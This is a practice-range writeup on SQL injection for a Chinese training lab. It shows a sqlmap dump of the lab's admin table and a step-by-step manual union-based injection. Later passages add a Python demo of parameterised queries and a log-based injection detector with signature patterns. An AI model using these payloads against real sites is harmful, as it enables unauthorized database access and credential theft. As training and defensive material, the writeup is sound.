封神臺 SQL injection practice range (貓舍 / Maoshe): manual injection
Range URL: http://pu2lh35s.ia.aqlab.cn/?id=1
Using a script
- You could simply run the sqlmap script straight against this URL, but that is far too boring.
- The script used here is sqlmapplus, a derivative of sqlmap; plain sqlmap works the same way.
sqlmapX -u "http://pu2lh35s.ia.aqlab.cn/?id=1" -D "maoshe" --dump --batch --random-agent
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.8#stable}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:46:16 /2024-10-12/
[20:46:16] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/416.11 (KHTML, like Gecko) Safari/416.12' from file '/home/kali/tools/SqlmapXPlus/data/txt/user-agents.txt'
[20:46:17] [INFO] resuming back-end DBMS 'mysql'
[20:46:17] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 8425=8425
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 3539 FROM (SELECT(SLEEP(5)))tWAV)
---
[20:46:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0.12
[20:46:17] [INFO] fetching tables for database: 'maoshe'
[20:46:17] [INFO] fetching number of tables for database 'maoshe'
[20:46:17] [INFO] resumed: 4
[20:46:17] [INFO] resumed: admin
[20:46:17] [INFO] resumed: dirs
[20:46:17] [INFO] resumed: news
[20:46:17] [INFO] resumed: xss
[20:46:17] [INFO] fetching columns for table 'admin' in database 'maoshe'
[20:46:17] [INFO] resumed: 3
[20:46:17] [INFO] resumed: Id
[20:46:17] [INFO] resumed: username
[20:46:17] [INFO] resumed: password
[20:46:17] [INFO] fetching entries for table 'admin' in database 'maoshe'
[20:46:17] [INFO] fetching number of entries for table 'admin' in database 'maoshe'
[20:46:17] [INFO] resumed: 2
[20:46:17] [INFO] resumed: 1
[20:46:17] [INFO] resumed: hellohack
[20:46:17] [INFO] resumed: admin
[20:46:17] [INFO] resumed: 2
[20:46:17] [INFO] resumed: zkaqbanban
[20:46:17] [INFO] resumed: ppt
Database: maoshe
Table: admin
[2 entries]
+----+------------+----------+
| Id | password | username |
+----+------------+----------+
| 1 | hellohack | admin | ## the flag has already been found here
| 2 | zkaqbanban | ppt |
+----+------------+----------+
[20:46:17] [INFO] table 'maoshe.`admin`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/pu2lh35s.ia.aqlab.cn/dump/maoshe/admin.csv'
[20:46:17] [INFO] fetching columns for table 'xss' in database 'maoshe'
[20:46:17] [INFO] resumed: 3
[20:46:17] [INFO] resumed: id
[20:46:17] [INFO] resumed: user
[20:46:17] [INFO] resumed: pass
[20:46:17] [INFO] fetching entries for table 'xss' in database 'maoshe'
[20:46:17] [INFO] fetching number of entries for table 'xss' in database 'maoshe'
[20:46:17] [INFO] resumed: 0
[20:46:17] [WARNING] table 'xss' in database 'maoshe' appears to be empty
Database: maoshe
Table: xss
[0 entries]
+----+------+--------+
| id | pass | user |
+----+------+--------+
+----+------+--------+
[20:46:17] [INFO] table 'maoshe.xss' dumped to CSV file '/home/kali/.local/share/sqlmap/output/pu2lh35s.ia.aqlab.cn/dump/maoshe/xss.csv'
[20:46:17] [INFO] fetching columns for table 'news' in database 'maoshe'
[20:46:17] [INFO] resumed: 2
[20:46:17] [INFO] resumed: id
[20:46:17] [INFO] resumed: content
[20:46:17] [INFO] fetching entries for table 'news' in database 'maoshe'
[20:46:17] [INFO] fetching number of entries for table 'news' in database 'maoshe'
[20:46:17] [INFO] resumed: 3
[20:46:17] [INFO] resumed: <div class="spacer"></div><div class="item"><div class="title">
[20:46:17] [INFO] resumed: 1
[20:46:17] [INFO] resumed: <h1>
[20:46:17] [INFO] resumed: 2
[20:46:17] [INFO] resumed: <h1>
[20:46:17] [INFO] resumed: 3
Database: maoshe
Table: news
[3 entries]
+----+-----------------------------------------------------------------+
| id | content |
+----+-----------------------------------------------------------------+
| 1 | <div class="spacer"></div><div class="item"><div class="title"> |
| 2 | <h1> |
| 3 | <h1> |
+----+-----------------------------------------------------------------+
[20:46:18] [INFO] table 'maoshe.news' dumped to CSV file '/home/kali/.local/share/sqlmap/output/pu2lh35s.ia.aqlab.cn/dump/maoshe/news.csv'
[20:46:18] [INFO] fetching columns for table 'dirs' in database 'maoshe'
[20:46:18] [INFO] resumed: 1
[20:46:18] [INFO] resumed: paths
[20:46:18] [INFO] fetching entries for table 'dirs' in database 'maoshe'
[20:46:18] [INFO] fetching number of entries for table 'dirs' in database 'maoshe'
[20:46:18] [INFO] resumed: 0
[20:46:18] [WARNING] table 'dirs' in database 'maoshe' appears to be empty
Database: maoshe
Table: dirs
[0 entries]
+-------+
| paths |
+-------+
+-------+
[20:46:18] [INFO] table 'maoshe.dirs' dumped to CSV file '/home/kali/.local/share/sqlmap/output/pu2lh35s.ia.aqlab.cn/dump/maoshe/dirs.csv'
[20:46:18] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/pu2lh35s.ia.aqlab.cn'
[*] ending @ 20:46:18 /2024-10-12/
Manual injection
Determining whether a SQL injection vulnerability exists
- Construct and 1=1; this condition is always true, and the page normally does not error.
- Then try 1=2.
- Here the page errors, which indicates that an injection vulnerability exists.
Using order by to determine the number of columns
- Construct
?id=1 and 1=1 order by 1
- The page does not change (order by 1 sorts by the first column, ascending by default, which is the normal order anyway).
- Next construct order by 2 and order by 3 in turn.
- In MySQL, an order by position greater than the number of selected columns raises an error, so this method reveals how many columns there are.
- order by 1 and order by 2 both work fine, but order by 3 errors.
Using a union query to determine the echo point
- The echo point is the part of the page that displays data from the database; for example, "view count" or "publish time" on some pages reflect database records.
- With this MySQL query the page displays only one row at a time, and it queries first and then displays. So we need the preceding condition ?id=1 and 1=1 to stop matching, so that the content of
union select 1,2
is displayed instead.
- We therefore make the first part fail by constructing ?id=1 and 1=2, and append
union select 1,2
as before.
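To make the two mechanics above concrete (why the first half of the query must be false before the union row becomes visible, and why order by 3 errors while order by 2 does not), here is an added demonstration that is not part of the original writeup. It reproduces the page's string-concatenated query pattern against an in-memory SQLite database instead of the range's MySQL server, and places the parameterised query that prevents the whole class of problem beside it. The news table, its rows and all function names are constructed for the example; database() and information_schema are MySQL-specific and are not exercised here.

```python
import sqlite3

# Constructed toy schema standing in for the range's MySQL "news" table (two
# columns, so the page query returns (id, content) for one id). Not the range's
# real schema; it only needs to reproduce the behaviour the writeup relies on.
SCHEMA = """
CREATE TABLE news (id INTEGER PRIMARY KEY, content TEXT);
INSERT INTO news VALUES (1, '<div class="spacer"></div>');
INSERT INTO news VALUES (2, '<h1>');
"""


def fresh_db():
    """In-memory SQLite database loaded with the constructed schema."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def vulnerable_lookup(con, raw_id):
    """The pattern the range exploits: the request parameter is pasted into
    the SQL text, so anything after the number is parsed as SQL. Shown for
    contrast with safe_lookup() only."""
    sql = "SELECT id, content FROM news WHERE id = " + raw_id
    return con.execute(sql).fetchall()


def safe_lookup(con, raw_id):
    """Parameterised form: the parameter is bound as a value. SQLite applies
    the column's INTEGER affinity, so '1' still matches row 1, while a string
    carrying SQL fragments matches nothing and is never parsed as SQL."""
    return con.execute(
        "SELECT id, content FROM news WHERE id = ?", (raw_id,)
    ).fetchall()


def column_count_probe(con, n):
    """The 'order by N' step: True if the database accepts ORDER BY position n,
    False if it rejects it because n exceeds the number of selected columns."""
    try:
        vulnerable_lookup(con, f"1 and 1=1 order by {n}")
        return True
    except sqlite3.OperationalError:
        return False


def first_row_shown(rows):
    """The page renders only the first row of the result set; mimic that."""
    return rows[0] if rows else None


def demo():
    con = fresh_db()
    return {
        # Always-true condition: the genuine row comes back unchanged.
        "and_1_eq_1": first_row_shown(vulnerable_lookup(con, "1 and 1=1")),
        # Always-false condition: the WHERE matches nothing, the page shows nothing.
        "and_1_eq_2": first_row_shown(vulnerable_lookup(con, "1 and 1=2")),
        # UNION with a true first half: two rows compete for the single slot.
        "union_with_true_half": len(vulnerable_lookup(con, "1 and 1=1 union select 1,2")),
        # UNION with a false first half: only the injected (1, 2) row remains,
        # so column 2 is the visible echo point.
        "union_with_false_half": vulnerable_lookup(con, "1 and 1=2 union select 1,2"),
        "order_by_2_ok": column_count_probe(con, 2),
        "order_by_3_ok": column_count_probe(con, 3),
        # Same inputs through the parameterised query: no rows, no error.
        "safe_union": safe_lookup(con, "1 and 1=2 union select 1,2"),
        "safe_normal": safe_lookup(con, "1"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The fix is the one-line change from concatenation to a bound parameter: the database driver never sees the attacker's text as SQL, so neither the union nor the order by probe has any effect, and no error leaks the column count.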
Using the echo point to retrieve the relevant data
- Query the current database name
  - Knowing that 2 is the echo point, we only need to replace 2 in the union query with the item we want to retrieve.
  - To get the current database name, replace 2 with database().
  - Construct id=1 and 1=2 union select 1,database()
  - The database name is maoshe
- Query the table names in the database
  - Construct
?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1
  - limit 0,1 means start at offset 0 and return one row.
  - Changing the trailing limit 0,1 to limit 1,1, limit 2,1 and so on shows the subsequent table names.
  - This shows that the tables in the database are admin, dirs, news and xss.
  - With limit 4,1 the result is blank, so there are only four tables; administrator information is usually kept in admin.
- Query the column names of the admin table
  - Construct
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1
  - Likewise, changing the trailing limit 0,1 shows the remaining columns: the first is id, the second username, the third password.
  - Now all the information has been found; just query it directly.
- Query the needed information
  - Construct
?id=1 and 1=2 union select 1,username from admin
  - Construct
?id=1 and 1=2 union select 1,password from admin where username = 'admin'
Done
- The flag has been found: it is the administrator's password, hellohack
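Seen from the server side, the whole manual workflow above leaves a recognisable trail in the web server's access log: the paired and 1=1 / and 1=2 requests, the order by N probes, then union select against information_schema. The following added example (not part of the original writeup) runs signature matching over constructed Common Log Format lines and flags a client only once it has progressed through several of those stages, which keeps a lone boolean test from paging anyone. The log lines, client addresses and function names are all constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access log lines (not taken from the range or the
# writeup). Host 10.0.0.5 replays the probing sequence described above:
# and 1=1 / 1=2, order by N, then union select against information_schema.
# Host 10.0.0.9 is ordinary traffic and must not be flagged.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Oct/2024:20:40:01 +0800] "GET /?id=1 HTTP/1.1" 200 2311
10.0.0.5 - - [12/Oct/2024:20:40:09 +0800] "GET /?id=1%20and%201=1 HTTP/1.1" 200 2311
10.0.0.5 - - [12/Oct/2024:20:40:15 +0800] "GET /?id=1%20and%201=2 HTTP/1.1" 200 1802
10.0.0.5 - - [12/Oct/2024:20:40:31 +0800] "GET /?id=1%20and%201=1%20order%20by%203 HTTP/1.1" 500 611
10.0.0.5 - - [12/Oct/2024:20:41:02 +0800] "GET /?id=1%20and%201=2%20union%20select%201,database() HTTP/1.1" 200 1810
10.0.0.5 - - [12/Oct/2024:20:41:40 +0800] "GET /?id=1+and+1%3D2+union+select+1,table_name+from+information_schema.tables+where+table_schema%3Ddatabase()+limit+0,1 HTTP/1.1" 200 1815
10.0.0.9 - - [12/Oct/2024:20:42:00 +0800] "GET /?id=2 HTTP/1.1" 200 2290
10.0.0.9 - - [12/Oct/2024:20:42:05 +0800] "GET /news?id=3&sort=order HTTP/1.1" 200 2290
"""

# Common Log Format: client, identd, user, [timestamp], "request line", status, bytes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# One signature per stage of the manual workflow in the writeup. Order matters:
# classify() reports tags in this order.
SIGNATURES = [
    ("boolean_probe", re.compile(r"\band\s+\d+\s*=\s*\d+", re.I)),
    ("column_count_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_injection", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema_enumeration", re.compile(r"\binformation_schema\.", re.I)),
]


def normalise(path):
    """URL-decode (treating '+' as space), strip inline /* */ comments that are
    sometimes used to break keywords apart, and collapse runs of whitespace."""
    decoded = unquote_plus(path)
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)
    return re.sub(r"\s+", " ", decoded)


def classify(path):
    """Return the list of signature names that match a request path."""
    text = normalise(path)
    return [name for name, rx in SIGNATURES if rx.search(text)]


def scan(log_text):
    """Parse each log line and keep those matching at least one signature."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not CLF; skip rather than guess
        tags = classify(m["path"])
        if tags:
            findings.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "status": int(m["status"]),
                "path": normalise(m["path"]),
                "tags": tags,
            })
    return findings


def summarize(findings):
    """Distinct stages observed per client address."""
    per_ip = {}
    for f in findings:
        per_ip.setdefault(f["ip"], set()).update(f["tags"])
    return per_ip


def flag_ips(summary, min_stages=2):
    """Clients that progressed through at least min_stages distinct stages.
    A single boolean probe is too noisy to alert on; the sequence is not."""
    return sorted(ip for ip, stages in summary.items() if len(stages) >= min_stages)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for f in found:
        print(f["ts"], f["ip"], f["status"], f["tags"], f["path"])
    print("flagged:", flag_ips(summarize(found)))
```

The 500 on the order by 3 request is itself a useful corroborating signal: a handful of requests from one client whose only difference is a trailing order by N, one of which errors, is the column-count step in the writeup seen from the other side. Signatures of this kind are a starting point, not a complete defence; the parameterised query remains the fix, and the log scan tells you who was looking.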